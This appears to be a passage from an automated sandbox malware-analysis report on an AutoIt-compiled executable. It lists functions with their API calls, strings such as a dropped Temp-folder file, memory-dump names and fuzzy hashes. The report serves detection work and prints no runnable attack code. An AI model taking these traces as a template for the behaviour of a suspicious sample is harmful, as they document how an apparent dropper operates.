                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,00A9E6A1), ref: 00A9E6DD
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,00A9E6A1,00000000,?,?,?,00A9E6A1), ref: 00AB7117
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,00A9E6A1,?,00000000,?,?,?,?,00A9E6A1), ref: 00AB715E
                            • RegCloseKey.ADVAPI32(?,?,?,?,00A9E6A1), ref: 00AB718F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID: Include$Software\AutoIt v3\AutoIt
                            • API String ID: 1586453840-614718249
                            • Opcode ID: 21bd67e37536bd8c9a01b0a3fcce6876b958ac5d575c4f01f4f14cb78ed3cea1
                            • Instruction ID: b6003bae0c738f28098c740e0b964e742ca5a74352743bcc0eff4b3e218aa034
                            • Opcode Fuzzy Hash: 21bd67e37536bd8c9a01b0a3fcce6876b958ac5d575c4f01f4f14cb78ed3cea1
                            • Instruction Fuzzy Hash: 5E21D572B80204BBDB14DBA8DD46FEFB3BDEF94700F104259F505E7191EAB1AA008750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC3EC5, Relevance: 10.6, APIs: 7, Instructions: 78processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AC3EE2
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AC3EF2
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00AC3F1D
                            • __wsplitpath.LIBCMT ref: 00AC3F48
                              • Part of subcall function 00AA392E: __wsplitpath_helper.LIBCMT ref: 00AA3970
                            • _wcscat.LIBCMT ref: 00AC3F5B
                            • __wcsicoll.LIBCMT ref: 00AC3F6B
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00AC3FA4
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                            • String ID:
                            • API String ID: 2431060436-0
                            • Opcode ID: d8b8ed092e85f66a4805c879cb5e4f599887b6e8ab987c05794fb63a4472f97f
                            • Instruction ID: bc8e0f4bad3f15e2dd0fa574b63172d4e5e57d3f55c446ea9af8fc7508eee80e
                            • Opcode Fuzzy Hash: d8b8ed092e85f66a4805c879cb5e4f599887b6e8ab987c05794fb63a4472f97f
                            • Instruction Fuzzy Hash: 832188768002056BDF11DF54DC84FEAB7B8EB49300F10859DF54A9B141EB755B95CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA0350, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            • CreateWindowExW.USER32 ref: 00AA0385
                            • CreateWindowExW.USER32 ref: 00AA03AE
                            • ShowWindow.USER32(?,00000000), ref: 00AA03C4
                            • ShowWindow.USER32(?,00000000), ref: 00AA03CE
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: 2c80c1bc9f89649160a1be2de4664d698455ea42121a5cab8fa4be00372d13b1
                            • Instruction ID: 857ec1696bcce984e1cbeba1fcd42de329e5b357bb6268e2bca2588d7d7c11d3
                            • Opcode Fuzzy Hash: 2c80c1bc9f89649160a1be2de4664d698455ea42121a5cab8fa4be00372d13b1
                            • Instruction Fuzzy Hash: 1CF0B771BD5314BAF6309764AC53F926698E718F11F304466B700BB1E0DEE479518BDC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA06E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 00AA06F7
                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 00AA071E
                            • RegCloseKey.KERNELBASE(?), ref: 00AA0745
                            • RegCloseKey.ADVAPI32(?), ref: 00AA0759
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Close$OpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 1607946009-824357125
                            • Opcode ID: bd6391f8e4a9746ea18e86ef76cf1b8fdb9e95bfa1b0c73d90eeb288ed55109f
                            • Instruction ID: 32f01c9ad4a95df2bb4fd8dfcf60a9cffc4151bfa0ac7af927a7e56c2b9c5ed3
                            • Opcode Fuzzy Hash: bd6391f8e4a9746ea18e86ef76cf1b8fdb9e95bfa1b0c73d90eeb288ed55109f
                            • Instruction Fuzzy Hash: FE115176A40108BF9B14CFA9DC49DEFB7BCEF59300B108659F909C3210EA319911DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9FEA7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fread_nolock_fseek_memmove_strcat
                            • String ID: AU3!
                            • API String ID: 1268643489-3499719025
                            • Opcode ID: 0e2922a059d02327bb0ac0d5c3d7cd7277620e51eebc37f306229846d9f55501
                            • Instruction ID: b450003aff5c24a7ddcf8743a270e6e90a971352867d434b7403c5a2712c3096
                            • Opcode Fuzzy Hash: 0e2922a059d02327bb0ac0d5c3d7cd7277620e51eebc37f306229846d9f55501
                            • Instruction Fuzzy Hash: 7F11D332E042546FCF11CB688981FFD7BA5AF4E300F6845A8F955DB282D7709644CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE7BCA, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteExW.SHELL32(0000003C), ref: 00AE7CDE
                              • Part of subcall function 00A9F260: _wcslen.LIBCMT ref: 00A9F262
                              • Part of subcall function 00A9F260: _wcscpy.LIBCMT ref: 00A9F282
                            • CloseHandle.KERNEL32(?), ref: 00AE7D80
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                            • String ID: <$@
                            • API String ID: 2417854910-1426351568
                            • Opcode ID: e55157a3553382321ae65ee51388106a6418c6a4e6580bc0a6fd5ed88f7f49b8
                            • Instruction ID: 6991b4ccafc88a64e8d6824b226897c52f991e29a37f09c399314868956ccdc2
                            • Opcode Fuzzy Hash: e55157a3553382321ae65ee51388106a6418c6a4e6580bc0a6fd5ed88f7f49b8
                            • Instruction Fuzzy Hash: E851B176A002499FCF10EFA5DA85AAFB7F8FF44300F108459E905AB291DB75ED45CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F490, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00A9FE20: _wcslen.LIBCMT ref: 00A9FE35
                              • Part of subcall function 00A9FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00AE43ED,?,00000000,?,?), ref: 00A9FE4E
                              • Part of subcall function 00A9FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00A9FE77
                            • _strcat.LIBCMT ref: 00A9F4B6
                              • Part of subcall function 00A9F540: _strlen.LIBCMT ref: 00A9F548
                              • Part of subcall function 00A9F540: _sprintf.LIBCMT ref: 00A9F69E
                            Strings
                            • ?T, xrefs: 00A9F522
                            • C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg, xrefs: 00A9F49D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                            • String ID: C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg$?T
                            • API String ID: 3199840319-1800187480
                            • Opcode ID: a9d705265e4d641eb2f82ff8bdf51046b6208478bda9f1585bfb47871b9e4fb0
                            • Instruction ID: 19507b44a1f1565fe767dae26b67553f0ba30c90f4367f4c0878ccc80414a262
                            • Opcode Fuzzy Hash: a9d705265e4d641eb2f82ff8bdf51046b6208478bda9f1585bfb47871b9e4fb0
                            • Instruction Fuzzy Hash: FD21F9B2A042016FD714EF749D82AAEF6D8AF85310F14893EF559C32C2EB74D9948792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9EE30, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNELBASE(uxtheme.dll,00A9EE15,00A9D92E), ref: 00A9EE3B
                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00A9EE4D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: IsThemeActive$uxtheme.dll
                            • API String ID: 2574300362-3542929980
                            • Opcode ID: dac73716dd018b0b81cb070e33baf650187901d91a94bfbe4d46c07b661519c5
                            • Instruction ID: 94c4fc0e7558f0f3fe9ffa3d9cff526158cb65575992c5fa25f3e1a93674e3a9
                            • Opcode Fuzzy Hash: dac73716dd018b0b81cb070e33baf650187901d91a94bfbe4d46c07b661519c5
                            • Instruction Fuzzy Hash: E2D0C9B9A00703EEDF348F21D80964277E4BB00B41F508868A5A1D2160DF74C480CA28
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AAF4A4, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentStringsW.KERNEL32(00000000,00AA6433), ref: 00AAF4A7
                            • __malloc_crt.LIBCMT ref: 00AAF4D6
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00AAF4E3
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: EnvironmentStrings$Free__malloc_crt
                            • String ID:
                            • API String ID: 237123855-0
                            • Opcode ID: 7c26ec2a2296a1acea687ec4cb521a043e4eed4561046fdb9c42fbc66a65aaec
                            • Instruction ID: be93c0e78359fa534af1e8d1db35b0110084359e5916a27cab82b5765d094209
                            • Opcode Fuzzy Hash: 7c26ec2a2296a1acea687ec4cb521a043e4eed4561046fdb9c42fbc66a65aaec
                            • Instruction Fuzzy Hash: D7F0E23B5001105F8B396BB4BC458A76638CADB36031A8026F402C3285FB248D8182A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA14F7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00AA1511
                              • Part of subcall function 00AA34DB: __FF_MSGBANNER.LIBCMT ref: 00AA34F4
                              • Part of subcall function 00AA34DB: __NMSG_WRITE.LIBCMT ref: 00AA34FB
                              • Part of subcall function 00AA34DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00AA6A35,?,00000001,?,?,00AA8179,00000018,00B1D180,0000000C,00AA8209), ref: 00AA3520
                            • std::exception::exception.LIBCMT ref: 00AA1546
                            • std::exception::exception.LIBCMT ref: 00AA1560
                            • __CxxThrowException@8.LIBCMT ref: 00AA1571
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                            • String ID:
                            • API String ID: 615853336-0
                            • Opcode ID: 05f81015708c08b7d1a6f3e9b9cca828a15f8763342e5728c1974268121ae998
                            • Instruction ID: 4760f9e7048b71718c00a4fce346bbf7df34f6015b63d596bb7e1878e44f12ef
                            • Opcode Fuzzy Hash: 05f81015708c08b7d1a6f3e9b9cca828a15f8763342e5728c1974268121ae998
                            • Instruction Fuzzy Hash: 86F0FF3290021ABBCB31EF64DD02AEE3BA9AF86314F5400A9F401931D2DBB18B45CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A91D10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • _wcslen.LIBCMT ref: 00A91D11
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • _memmove.LIBCMT ref: 00A91D57
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1546
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1560
                              • Part of subcall function 00AA14F7: __CxxThrowException@8.LIBCMT ref: 00AA1571
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                            • String ID: @EXITCODE
                            • API String ID: 2734553683-3436989551
                            • Opcode ID: 1a844ac73ab799d9daf97c23806e3f3c9fcb079102dc3b8a7e42763821c4ca4c
                            • Instruction ID: d51a22ff7443e3fb83b8f763aff35c256d5063f9de244675da5904df1b4c3414
                            • Opcode Fuzzy Hash: 1a844ac73ab799d9daf97c23806e3f3c9fcb079102dc3b8a7e42763821c4ca4c
                            • Instruction Fuzzy Hash: D0F01DF2A407426FD754DB78CD42B6776E49B46704F14C92DA08AC77C2FB7AE4428B10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA49DA, Relevance: 4.7, APIs: 3, Instructions: 160COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 1794320848-0
                            • Opcode ID: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
                            • Instruction ID: c6e12fce637e33a11a40a4cd85d081aa1b2a69c06f33d881ffbffb79f6b6c1be
                            • Opcode Fuzzy Hash: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
                            • Instruction Fuzzy Hash: A351C331A00305EFDB248FA9C94469EB7B1AFCA360F248269F835A71D0D7B0DE50DB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A93868, Relevance: 4.7, APIs: 3, Instructions: 154COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcslen
                            • String ID:
                            • API String ID: 176396367-0
                            • Opcode ID: 74aa89b194baf1ab0677dca40a6bf60f02a27ae3f8ba5ee9965aafbd16855d3e
                            • Instruction ID: e33e05f79954bacce142cdf0e1b014f354e8c579f94bd382d78b690af6346b64
                            • Opcode Fuzzy Hash: 74aa89b194baf1ab0677dca40a6bf60f02a27ae3f8ba5ee9965aafbd16855d3e
                            • Instruction Fuzzy Hash: 7951D8B2608340AAEF21EB6889417EB77F8AF92700F04882DF9C557141EB75DA49C7D3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A99769, Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Message$DispatchPeekTranslate
                            • String ID:
                            • API String ID: 4217535847-0
                            • Opcode ID: e2f0ec8d914b7c76b60939e44a54eee9ea6e71a1c2e73a06c26b8398203f3590
                            • Instruction ID: 93fa460d8186f4eea56891f15fe8c4ed8e19125ac8d1099839766e2b0ee8c67f
                            • Opcode Fuzzy Hash: e2f0ec8d914b7c76b60939e44a54eee9ea6e71a1c2e73a06c26b8398203f3590
                            • Instruction Fuzzy Hash: 68F0FE32254701AADB24DBA48E85BDB7BE9AF94780F50481CF785865E0FF70D444CB63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F180, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00A9F490: _strcat.LIBCMT ref: 00A9F4B6
                            • _free.LIBCMT ref: 00AB9524
                              • Part of subcall function 00A935F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00A93681
                              • Part of subcall function 00A935F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A93697
                              • Part of subcall function 00A935F0: __wsplitpath.LIBCMT ref: 00A936C2
                              • Part of subcall function 00A935F0: _wcscpy.LIBCMT ref: 00A936D7
                              • Part of subcall function 00A935F0: _wcscat.LIBCMT ref: 00A936EC
                              • Part of subcall function 00A935F0: SetCurrentDirectoryW.KERNELBASE(?), ref: 00A936FC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458785980.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458805446.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458813895.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458830435.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458853673.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                            • String ID: C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg
                            • API String ID: 3938964917-1666458635
                            • Opcode ID: 63cc58d139a8ebb33089c50481e2765c69ad1cb6018835e5bd07bc0ddfac3f56
                            • Instruction ID: cdb8ac4d1bfbb1ece169c6ff57e24f87e3e063b5d643276c40f0f3641ee8e85b
                            • Opcode Fuzzy Hash: 63cc58d139a8ebb33089c50481e2765c69ad1cb6018835e5bd07bc0ddfac3f56
                            • Instruction Fuzzy Hash: 47916071A00219ABCF14DFA4C9819EF77B9FF49310F148529FA15AB352D735EA05CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9F1D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 00AB959F
                              • Part of subcall function 00A9F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00A9F1F5,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,00B390E8,C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg,?,00A9F1F5,?,?,00000001), ref: 00A9F23C
                              • Part of subcall function 00A9F3B0: SHGetMalloc.SHELL32(00A9F1FC), ref: 00A9F3BD
                              • Part of subcall function 00A9F3B0: SHGetDesktopFolder.SHELL32(?,00B390E8), ref: 00A9F3D2
                              • Part of subcall function 00A9F3B0: _wcsncpy.LIBCMT ref: 00A9F3ED
                              • Part of subcall function 00A9F3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00A9F427
                              • Part of subcall function 00A9F3B0: _wcsncpy.LIBCMT ref: 00A9F440
                              • Part of subcall function 00A9F290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00A9F2AB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.458479941.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 0000000A.00000002.458461823.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp Download File
